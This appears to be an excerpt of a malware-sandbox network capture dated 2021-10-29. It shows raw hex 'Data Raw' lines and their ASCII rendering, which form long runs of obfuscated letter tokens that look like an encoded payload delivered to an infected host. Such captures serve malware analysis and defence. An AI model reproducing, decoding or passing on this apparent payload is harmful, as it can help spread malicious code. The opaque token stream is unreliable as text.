                                                  2021-10-29 18:30:02 UTC1800INData Raw: 4f 78 6b 20 4f 59 6f 20 4f 6f 4f 20 4f 52 6b 20 59 78 20 59 6b 20 4f 78 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 59 4f 20 4f 4f 6f 20 4f 78 45 20 4b 52 20 6f 6f 45 20 45 4b 20 4f 4b 45 20 4f 4f 4b 20 4f 78 59 20 59 45 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 52 78 20 6b 4b 20 4f 6f 51 20 4f 4f 59 20 4f 6f 6b 20 4f 78 78 20 6f 45 52 20 4b 6b 20 6b 20 4f 4f 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6f 45 78 20 59 78 20 4f 51 20 45 20 6f 4f 51 20 52 4b 20 4f 4b 74 20 4f 4f 74 20 45 45 20 4b 78 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 4f 51 4b 20 4f 4f 4b 20 6f 4b 59 20 4b 4b 20 4f 59 74 20 45 6b 20 6f 4f 6f 20 59 78 20 4f 78 4b 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 52 4b 20 4b 6b 20 4f 4f 78 20 4b 51 20 4f 6b 59
                                                  Data Ascii: Oxk OYo OoO ORk Yx Yk OxR YK kK OOK OOt oYO OOo OxE KR ooE EK OKE OOK OxY YE OOo Yx Kk Yx ORx kK OoQ OOY Ook Oxx oER Kk k OOx kK OOK OOt OxQ oEx Yx OQ E oOQ RK OKt OOt EE Kx Yx Kk Yx YK OQK OOK oKY KK OYt Ek oOo Yx OxK Oo OOK OOt OxQ OOo ORK Kk OOx KQ OkY
                                                  2021-10-29 18:30:02 UTC1804INData Raw: 20 6f 4b 74 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 52 52 20 59 78 20 4f 4b 59 20 4f 78 4b 20 4f 6f 4b 20 51 51 20 45 45 20 4f 4f 45 20 59 78 20 4f 6b 45 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 6f 74 20 4f 78 51 20 4f 74 4b 20 6f 4b 20 45 6b 20 45 52 20 4f 6f 78 20 6b 59 20 6f 4b 4f 20 6f 4b 6f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 52 4b 20 52 6f 20 6f 51 20 4f 78 74 20 4f 78 4b 20 4f 6f 45 20 52 45 20 59 4f 20 4f 6f 6b 20 4f 6b 4f 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 59 4f 20 4f 4f 6f 20 51 52 20 4b 4f 20 4f 74 20 45 6f 20 6f 74 20 4f 4f 59 20 4f 45 45 20 6f 45 4b 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 52 78 20 6b 4b 20 4b 4f 20 4f 78 6b 20 4f 6b 78 20 4f 6f 59 20 51 6b 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f
                                                  Data Ascii: oKt OOt OxQ OOo Yx ORR Yx OKY OxK OoK QQ EE OOE Yx OkE Yx YK kK OOK oot OxQ OtK oK Ek ER Oox kY oKO oKo OxQ OOo Yx Kk ORK Ro oQ Oxt OxK OoE RE YO Ook OkO YK kK OOK OOt oYO OOo QR KO Ot Eo ot OOY OEE oEK OOo Yx Kk Yx ORx kK KO Oxk Okx OoY Qk KQ Yx YK kK O
                                                  2021-10-29 18:30:02 UTC1808INData Raw: 59 6b 20 6f 6f 52 20 59 6f 20 6f 59 59 20 6b 4b 20 6f 4b 51 20 4f 4f 52 20 4f 74 4b 20 6f 78 51 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6f 4f 78 20 4f 6f 6f 20 4f 74 59 20 4f 78 74 20 51 52 20 59 78 20 4f 6b 74 20 59 4f 20 6f 59 78 20 6f 4b 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 6b 78 20 59 52 20 4f 45 59 20 52 6f 20 6f 6f 51 20 4f 78 78 20 6f 4b 51 20 4f 78 6b 20 4f 52 4b 20 4f 4b 74 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 6f 4b 4b 20 4f 6f 59 20 6f 78 6b 20 4f 6f 78 20 4f 45 74 20 45 6b 20 4f 51 78 20 59 59 20 4f 45 74 20 6f 4f 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 6f 20 59 6b 20 4f 78 20 51 59 20 4f 6b 78 20 51 51 20 6f 6f 4b 20 4f 4f 45 20 6f 4f 59 20 4f 4b 59 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 45 20 4f
                                                  Data Ascii: Yk ooR Yo oYY kK oKQ OOR OtK oxQ Yx Kk Yx YK oOx Ooo OtY Oxt QR Yx Okt YO oYx oKY OOK OOt OxQ OOo Okx YR OEY Ro ooQ Oxx oKQ Oxk ORK OKt Kk Yx YK kK oKK OoY oxk Oox OEt Ek OQx YY OEt oOO OOt OxQ OOo Yx Oko Yk Ox QY Okx QQ ooK OOE oOY OKY Yx YK kK OOK oKE O
                                                  2021-10-29 18:30:02 UTC1812INData Raw: 20 59 6b 20 4f 78 4f 20 45 59 20 4f 6f 74 20 6b 4f 20 6f 4f 74 20 4f 4f 52 20 6f 6f 4f 20 6f 4f 45 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6f 4f 78 20 4f 6f 6f 20 4f 6b 6b 20 4f 6f 4b 20 4f 78 74 20 59 78 20 4f 59 52 20 59 4f 20 4f 4b 6f 20 6f 4b 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 6b 78 20 59 52 20 6f 6f 74 20 45 51 20 6f 51 20 4f 4f 51 20 6f 4f 74 20 4f 78 6b 20 4f 74 74 20 4f 59 4f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 6f 4b 4b 20 4f 6f 59 20 4f 4f 59 20 4f 4f 6f 20 4f 74 45 20 45 74 20 4f 59 51 20 59 59 20 4f 59 74 20 6f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 6f 20 59 6b 20 4f 74 20 6b 4b 20 6f 4f 45 20 51 52 20 4f 51 6f 20 4f 4f 45 20 6f 6f 4b 20 4f 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 45 20
                                                  Data Ascii: Yk OxO EY Oot kO oOt OOR ooO oOE Yx Kk Yx YK oOx Ooo Okk OoK Oxt Yx OYR YO OKo oKO OOK OOt OxQ OOo Okx YR oot EQ oQ OOQ oOt Oxk Ott OYO Kk Yx YK kK oKK OoY OOY OOo OtE Et OYQ YY OYt oOY OOt OxQ OOo Yx Oko Yk Ot kK oOE QR OQo OOE ooK OKQ Yx YK kK OOK oKE
                                                  2021-10-29 18:30:02 UTC1816INData Raw: 4b 20 4f 6f 59 20 6f 4f 52 20 4f 6f 78 20 6f 59 4f 20 4b 6b 20 6f 6f 59 20 59 59 20 74 6b 20 6f 4f 51 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 6f 20 59 6b 20 4f 45 51 20 51 6f 20 51 6b 20 4f 4f 74 20 4f 51 78 20 4f 4f 45 20 4f 74 20 4f 59 45 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 45 20 4f 78 4f 20 74 52 20 59 74 20 6f 4b 51 20 59 78 20 6f 6f 52 20 6b 59 20 6b 51 20 6f 6f 78 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 6b 78 20 52 6f 20 4f 52 20 4f 6f 4f 20 4f 78 4f 20 4f 78 51 20 4f 52 4b 20 59 4f 20 4b 20 4f 59 59 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f 45 59 20 4f 6f 78 20 6f 45 59 20 52 78 20 6f 59 4f 20 59 4b 20 4f 6f 51 20 4f 4f 59 20 74 45 20 4f 51 52 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 74 52 20 51 6f 20 4f
                                                  Data Ascii: K OoY oOR Oox oYO Kk ooY YY tk oOQ OOt OxQ OOo Yx Oko Yk OEQ Qo Qk OOt OQx OOE Ot OYE Yx YK kK OOK oKE OxO tR Yt oKQ Yx ooR kY kQ oox OxQ OOo Yx Kk Okx Ro OR OoO OxO OxQ ORK YO K OYY YK kK OOK OOt oEY Oox oEY Rx oYO YK OoQ OOY tE OQR OOo Yx Kk Yx OtR Qo O
                                                  2021-10-29 18:30:02 UTC1820INData Raw: 4b 6b 20 59 78 20 4f 6b 4f 20 6b 4b 20 4f 6f 45 20 4f 4f 51 20 4f 51 59 20 4f 78 4b 20 4f 78 6b 20 59 78 20 74 59 20 4f 59 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6f 4b 45 20 59 78 20 51 6b 20 4b 6b 20 6f 6f 4f 20 52 74 20 4b 59 20 4f 4f 51 20 6f 45 52 20 6f 4f 51 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6f 4f 78 20 4f 78 52 20 6f 59 4f 20 6b 51 20 4f 4f 74 20 59 78 20 6b 78 20 4b 6b 20 4f 59 78 20 6f 59 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 6f 4f 4f 20 4b 51 20 4f 45 4f 20 6f 4f 20 6b 59 20 4f 4f 4b 20 6f 78 20 4f 4f 4f 20 6f 4f 6f 20 4f 59 45 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4b 74 20 4f 4f 52 20 4f 52 4f 20 4b 6b 20 4b 4f 20 4b 6b 20 6b 45 20 59 6f 20 4b 20 6f 6f 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 78
                                                  Data Ascii: Kk Yx OkO kK OoE OOQ OQY OxK Oxk Yx tY OYt kK OOK OOt OxQ oKE Yx Qk Kk ooO Rt KY OOQ oER oOQ Yx Kk Yx YK oOx OxR oYO kQ OOt Yx kx Kk OYx oYY OOK OOt OxQ OOo oOO KQ OEO oO kY OOK ox OOO oOo OYE Kk Yx YK kK OKt OOR ORO Kk KO Kk kE Yo K ooE OOt OxQ OOo Yx ox
                                                  2021-10-29 18:30:02 UTC1824INData Raw: 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f
                                                  Data Ascii: Ot OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx O
                                                  2021-10-29 18:30:02 UTC1828INData Raw: 20 4f 4f 74 20 74 4b 20 6b 4f 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 45 20 4f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4b 59 20 4f 52 20 59 4b 20 6b 4b 20 4f 4f 6f 20 4f 4f 74 20 59 6f 20 4b 51 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 6f 78 45 20 4b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 59 6b 20 59 4f 20 45 4b 20 45 6f 20 4b 6b 20 59 4b 20 6f 45 74 20 6b 51 20 4f 78 4f 20 4f 6f 59 20 4f 4f 59 20 59 78 20 6f 4b 6f 20 6f 59 20 59 4b 20
                                                  Data Ascii: OOt tK kO Yx Kk YO YK E OOk OOt OxQ OOE Yx KY OR YK kK OOo OOt Yo KQ Yx Kk YO YK oxE Kk OOt OxQ OOK Yx OOQ oO YK kK OOY OOt Yk YO EK Eo Kk YK oEt kQ OxO OoY OOY Yx oKo oY YK
                                                  2021-10-29 18:30:02 UTC1828INData Raw: 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 52 6b 20 74 4f 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 6f 59 6f 20 51 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 59 6f 20 6f 74 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4f 51 74 20 6b 51 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 4f 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4b 6f 20 6b 74 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 4f 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 52 78 20 6b 51 20 59 78 20 4b 6b 20 4b 6b 20 59 4b 20 6f 6f 78 20 51 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4b
                                                  Data Ascii: kK OOk OOt Rk tO Yx Kk YO YK oYo QO OOt OxQ OOE Yx OYo ot YK kK OOY OOt OQt kQ Yx Kk YO YK OQ kY OOt OxQ OOE Yx OOQ oO YK kK OOY OOt Ko kt Yx Kk YO YK OQ kY OOt OxQ OOE Yx OOQ oO YK kK OOY OOt Rx kQ Yx Kk Kk YK oox QO OOt OxQ OOE Yx OOQ oO YK kK OOY OOt K
                                                  2021-10-29 18:30:02 UTC1832INData Raw: 4f 74 20 4f 78 51 20 4f 6f 45 20 59 78 20 4f 6f 4f 20 4f 59 20 59 6f 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 51 4f 20 59 78 20 59 78 20 4b 6b 20 4b 6b 20 59 4b 20 4f 4f 45 20 74 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 6f 4f 20 4f 59 20 59 4b 20 6b 4b 20 4f 4f 6f 20 4f 4f 74 20 51 51 20 4f 4f 78 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 51 51 20 4b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 74 20 4f 4f 6f 20 59 4b 20 6b 4b 20 4f 4f 6f 20 4f 4f 74 20 4f 52 74 20 51 78 20 59 78 20 4b 6b 20 4b 51 20 59 4b 20 6f 51 20 74 51 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 6f 4f 20 4f 6f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 45 52 20 74 74 20 59 78 20 4b 6b 20 4b 6b 20 59 4b 20 51 78 20 4f 78 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78
                                                  Data Ascii: Ot OxQ OoE Yx OoO OY Yo kK OOY OOt QO Yx Yx Kk Kk YK OOE tR OOt OxQ OOE Yx OoO OY YK kK OOo OOt QQ OOx Yx Kk YO YK QQ Kk OOt OxQ OOE Yx t OOo YK kK OOo OOt ORt Qx Yx Kk KQ YK oQ tQ OOt OxQ OOE Yx oO Oo YK kK OOY OOt ER tt Yx Kk Kk YK Qx Oxk OOt OxQ OOE Yx
                                                  2021-10-29 18:30:02 UTC1836INData Raw: 20 4f 51 51 20 6b 74 20 6f 6b 20 4f 78 52 20 4f 74 74 20 4f 4f 52 20 6f 45 78 20 4b 6b 20 4f 51 78 20 6f 51 20 4f 4f 59 20 4f 4f 4b 20 4f 4f 52 20 4f 78 6b 20 6f 59 4b 20 52 20 6f 4f 4f 20 59 4b 20 45 51 20 6b 59 20 74 20 52 6b 20 4f 45 59 20 4f 4f 52 20 59 4f 20 59 6f 20 52 6b 20 51 20 4f 52 74 20 4f 4f 6b 20 4f 4f 52 20 4f 78 59 20 4f 6f 4f 20 51 20 6f 78 4f 20 59 4b 20 52 45 20 6b 78 20 45 45 20 4f 4f 78 20 4f 4b 52 20 4f 4f 52 20 6f 45 6b 20 4b 6b 20 4f 6b 6b 20 6f 20 6b 59 20 4f 4f 4b 20 4f 78 78 20 4f 78 59 20 4f 45 45 20 6f 4f 20 4b 78 20 59 59 20 6f 45 20 6b 78 20 6f 4f 74 20 6b 52 20 4f 78 6b 20 4f 4f 6f 20 4f 51 20 59 6f 20 4b 74 20 4f 4f 6b 20 6b 59 20 4f 4f 4b 20 4f 4f 52 20 4f 78 6b 20 4f 6b 78 20 4f 74 20 4b 51 20 59 78 20 4b 74 20 6b 59 20
                                                  Data Ascii: OQQ kt ok OxR Ott OOR oEx Kk OQx oQ OOY OOK OOR Oxk oYK R oOO YK EQ kY t Rk OEY OOR YO Yo Rk Q ORt OOk OOR OxY OoO Q oxO YK RE kx EE OOx OKR OOR oEk Kk Okk o kY OOK Oxx OxY OEE oO Kx YY oE kx oOt kR Oxk OOo OQ Yo Kt OOk kY OOK OOR Oxk Okx Ot KQ Yx Kt kY
                                                  2021-10-29 18:30:02 UTC1840INData Raw: 20 6f 20 6b 59 20 4f 4f 4b 20 45 52 20 4f 78 4b 20 6f 4b 6f 20 6f 4f 20 52 6b 20 52 45 20 4f 78 45 20 6b 4f 20 6f 78 74 20 6b 6f 20 6f 59 20 4f 6f 59 20 4f 78 74 20 59 45 20 4b 4f 20 4f 4b 20 4b 59 20 4f 6f 74 20 52 78 20 4f 4f 4f 20 6f 4b 20 4f 4f 4b 20 4f 74 52 20 52 45 20 4f 6f 74 20 6b 52 20 6f 59 4b 20 59 45 20 6f 45 74 20 4f 6f 59 20 4f 6f 45 20 59 78 20 74 59 20 4f 4f 6b 20 6f 4f 6f 20 4f 6f 74 20 52 78 20 4f 4f 4f 20 4b 78 20 4f 4f 4b 20 4f 74 52 20 52 45 20 4f 78 45 20 6b 4f 20 6f 78 6b 20 4f 78 52 20 6f 45 4b 20 4f 6f 59 20 51 4f 20 59 45 20 4f 6b 6b 20 6f 20 6b 59 20 4f 4f 4b 20 6f 6b 20 4f 78 4b 20 52 74 20 6f 4b 20 59 45 20 59 78 20 51 59 20 6b 4f 20 4f 78 45 20 51 59 20 4f 78 4b 20 4f 4f 6f 20 51 4f 20 59 45 20 6f 52 20 4b 59 20 6b 4f 20 4f
                                                  Data Ascii: o kY OOK ER OxK oKo oO Rk RE OxE kO oxt ko oY OoY Oxt YE KO OK KY Oot Rx OOO oK OOK OtR RE Oot kR oYK YE oEt OoY OoE Yx tY OOk oOo Oot Rx OOO Kx OOK OtR RE OxE kO oxk OxR oEK OoY QO YE Okk o kY OOK ok OxK Rt oK YE Yx QY kO OxE QY OxK OOo QO YE oR KY kO O
                                                  2021-10-29 18:30:02 UTC1845INData Raw: 78 52 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 6b 59 20 6b 45 20 6f 78 51 20 4f 4f 74 20 4f 4f 45 20 4f 4f 78 20 51 4f 20 59 59 20 4f 6f 51 20 59 4b 20 6f 45 4b 20 4f 78 4b 20 6f 4b 4b 20 4f 78 52 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 4f 6b 4f 20 6b 45 20 6f 78 51 20 4f 4f 74 20 4b 4f 20 4f 4f 78 20 4f 6b 74 20 59 59 20 4f 6f 51 20 59 4b 20 4f 59 4b 20 4f 78 4b 20 6f 4f 6f 20 4f 78 52 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 4f 4b 51 20 6b 45 20 6f 78 51 20 4f 4f 74 20 52 20 4f 4f 78 20 4f 59 59 20 59 59 20 4f 6f 51 20 59 4b 20 4f 45 51 20 4f 78 4b 20 4f 6b 78 20 4f 78 52 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 6f 4b 59 20 6b 45 20 6f 78 51 20 4f 4f 74 20 6f 59 59 20 4f 4f 78 20 6f 59 4f 20 59 59 20 4f 6f 51 20 59 4b 20 4f 52 4b 20 4f 78 4b 20 4f
                                                  Data Ascii: xR YO Yx OQk RO kY kE oxQ OOt OOE OOx QO YY OoQ YK oEK OxK oKK OxR YO Yx OQk RO OkO kE oxQ OOt KO OOx Okt YY OoQ YK OYK OxK oOo OxR YO Yx OQk RO OKQ kE oxQ OOt R OOx OYY YY OoQ YK OEQ OxK Okx OxR YO Yx OQk RO oKY kE oxQ OOt oYY OOx oYO YY OoQ YK ORK OxK O
                                                  2021-10-29 18:30:02 UTC1849INData Raw: 51 6b 20 52 4f 20 4f 4f 6b 20 4f 4f 51 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 6b 6f 20 4f 51 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 6f 4b 59 20 74 6b 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 4f 59 78 20 4f 4f 51 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 6f 4f 78 20 4f 51 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 4f 4f 74 20 74 45 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 6f 6f 20 4f 4f 6f 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 4f 4f 4b 20 6f 78 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 6f 4f 20 74 45 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 4f 6b 6f 20 4f 4f 6f 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 4f 4b 52 20 6f 78 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 4f 6b 4f 20 74 45 20 59 4f 20 59 78
                                                  Data Ascii: Qk RO OOk OOQ KQ OOt OYY Oot ko OQ OOE YK ORo OoY oKY tk YO Yx OQk RO OYx OOQ KQ OOt OYY Oot oOx OQ OOE YK ORo OoY OOt tE YO Yx OQk RO oo OOo KQ OOt OYY Oot OOK ox OOE YK ORo OoY oO tE YO Yx OQk RO Oko OOo KQ OOt OYY Oot OKR ox OOE YK ORo OoY OkO tE YO Yx
                                                  2021-10-29 18:30:02 UTC1853INData Raw: 78 51 20 6f 45 20 59 78 20 4b 51 20 59 78 20 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 59 20 4f 4f 6f 20 59 4f 20 4b 6b 20 4f 6b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 6b 20 4f 78 51 20 4f 4f 45 20 59 78 20 6f 6f 20 59 78 20 59 4b 20 6b 4b 20 6f 4b 20 4f 4f 74 20 4f 78 6b 20 4f 4f 6f 20 6f 52 20 4b 6b 20 59 78 20 59 4b 20 52 45 20 4f 4f 4b 20 4f 4f 52 20 4f 78 51 20 51 78 20 59 78 20 4b 6b 20 59 78 20 51 78 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 52 59 20 4f 4f 6f 20 59 78 20 4b 6b 20 51 59 20 59 4b 20 6b 59 20 4f 4f 4b 20 51 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 51 4b 20 59 78 20 59 59 20 6b 4b 20 52 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 51 45 20 4b 6b 20 59 4f 20 59 4b 20 4f 4f 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 78 20 59 78 20 4b 51 20 59 78 20 6b
                                                  Data Ascii: xQ oE Yx KQ Yx Kx kK OOK OOt Y OOo YO Kk Ok YK kK OOK ok OxQ OOE Yx oo Yx YK kK oK OOt Oxk OOo oR Kk Yx YK RE OOK OOR OxQ Qx Yx Kk Yx Qx kK OOY OOt RY OOo Yx Kk QY YK kY OOK QO OxQ OOo Yx QK Yx YY kK RR OOt OxQ OOo QE Kk YO YK OOx OOK OOt OxQ x Yx KQ Yx k
                                                  2021-10-29 18:30:02 UTC1857INData Raw: 59 20 4f 4f 74 20 4f 78 6b 20 4f 4f 6f 20 4f 52 20 4b 51 20 6f 4f 20 59 4b 20 6b 52 20 4f 4f 4b 20 6b 52 20 4f 78 6b 20 6b 51 20 59 78 20 4b 51 20 59 78 20 4f 6b 20 6b 59 20 51 4f 20 4f 4f 74 20 4f 4f 4f 20 4f 4f 6f 20 6f 45 20 4b 51 20 6f 59 20 59 4b 20 6b 59 20 4f 4f 4b 20 6b 45 20 4f 78 6b 20 51 4f 20 59 78 20 59 78 20 59 78 20 4f 74 20 6b 59 20 51 59 20 4f 4f 74 20 4f 78 6b 20 4f 4f 6f 20 6f 52 20 4b 51 20 45 4f 20 59 4b 20 6b 52 20 4f 4f 4b 20 51 6f 20 4f 78 6b 20 51 59 20 59 78 20 4b 51 20 59 78 20 6f 6b 20 6b 59 20 51 45 20 4f 4f 74 20 4f 4f 4f 20 4f 4f 6f 20 45 4f 20 4b 51 20 45 20 59 4b 20 6b 59 20 4f 4f 4b 20 51 4f 20 4f 78 6b 20 52 59 20 59 78 20 59 78 20 59 78 20 6f 59 20 6b 59 20 52 59 20 4f 4f 74 20 4f 78 6b 20 4f 4f 6f 20 6f 20 4b 51 20 4f
                                                  Data Ascii: Y OOt Oxk OOo OR KQ oO YK kR OOK kR Oxk kQ Yx KQ Yx Ok kY QO OOt OOO OOo oE KQ oY YK kY OOK kE Oxk QO Yx Yx Yx Ot kY QY OOt Oxk OOo oR KQ EO YK kR OOK Qo Oxk QY Yx KQ Yx ok kY QE OOt OOO OOo EO KQ E YK kY OOK QO Oxk RY Yx Yx Yx oY kY RY OOt Oxk OOo o KQ O
                                                  2021-10-29 18:30:02 UTC1860INData Raw: 4f 78 6b 20 6f 78 4f 20 59 78 20 4b 51 20 59 78 20 6f 4b 45 20 6b 59 20 6f 78 45 20 4f 4f 74 20 4f 4f 4f 20 4f 4f 6f 20 6f 4b 4b 20 4b 51 20 4f 45 74 20 59 4b 20 6b 59 20 4f 4f 4b 20 4f 74 6b 20 4f 78 6b 20 6f 78 45 20 59 78 20 59 78 20 59 78 20 6f 59 4b 20 6b 59 20 6f 78 74 20 4f 4f 74 20 4f 78 6b 20 4f 4f 6f 20 6f 59 4f 20 4b 51 20 4f 4b 45 20 59 4b 20 6b 52 20 4f 4f 4b 20 4f 51 4f 20 4f 78 6b 20 6f 78 74 20 59 78 20 4b 51 20 59 78 20 6f 59 45 20 6b 59 20 6f 78 59 20 4f 4f 74 20 4f 4f 4f 20 4f 4f 6f 20 6f 59 4b 20 4b 51 20 6f 4b 45 20 59 4b 20 6b 59 20 4f 4f 4b 20 4f 6b 4b 20 4f 78 6b 20 4f 74 74 20 59 78 20 59 78 20 59 78 20 6f 4b 6b 20 6b 59 20 4f 74 74 20 4f 4f 74 20 4f 78 6b 20 4f 4f 6f 20 6f 59 45 20 4b 51 20 6f 4b 4f 20 59 4b 20 6b 52 20 4f 4f 4b
                                                  Data Ascii: Oxk oxO Yx KQ Yx oKE kY oxE OOt OOO OOo oKK KQ OEt YK kY OOK Otk Oxk oxE Yx Yx Yx oYK kY oxt OOt Oxk OOo oYO KQ OKE YK kR OOK OQO Oxk oxt Yx KQ Yx oYE kY oxY OOt OOO OOo oYK KQ oKE YK kY OOK OkK Oxk Ott Yx Yx Yx oKk kY Ott OOt Oxk OOo oYE KQ oKO YK kR OOK
                                                  2021-10-29 18:30:02 UTC1864INData Raw: 20 52 6f 20 4b 6b 20 51 74 20 59 4b 20 6b 51 20 4f 4f 4b 20 45 45 20 4f 78 51 20 4f 6f 59 20 59 78 20 4f 78 4f 20 59 78 20 45 59 20 6b 4b 20 45 52 20 4f 4f 74 20 4f 6f 6f 20 4f 4f 6f 20 4f 78 4f 20 4b 6b 20 4f 51 20 59 4b 20 4f 6f 20 4f 4f 4b 20 6b 74 20 4f 78 51 20 4b 4f 20 59 78 20 4f 6b 20 59 78 20 4f 78 6b 20 6b 4b 20 6b 52 20 4f 4f 74 20 59 4b 20 4f 4f 6f 20 6f 6f 20 4b 6b 20 4f 4f 78 20 59 4b 20 4f 4f 45 20 4f 4f 4b 20 4b 78 20 4f 78 51 20 6b 74 20 59 78 20 4f 4f 78 20 59 78 20 4f 4f 59 20 6b 4b 20 4b 59 20 4f 4f 74 20 4b 78 20 4f 4f 6f 20 6b 6f 20 4b 6b 20 4f 4f 51 20 59 4b 20 59 45 20 4f 4f 4b 20 4b 6b 20 4f 78 51 20 4f 6b 20 59 78 20 4f 4f 74 20 59 78 20 6b 59 20 6b 4b 20 59 59 20 4f 4f 74 20 51 20 4f 4f 6f 20 4f 4f 51 20 4b 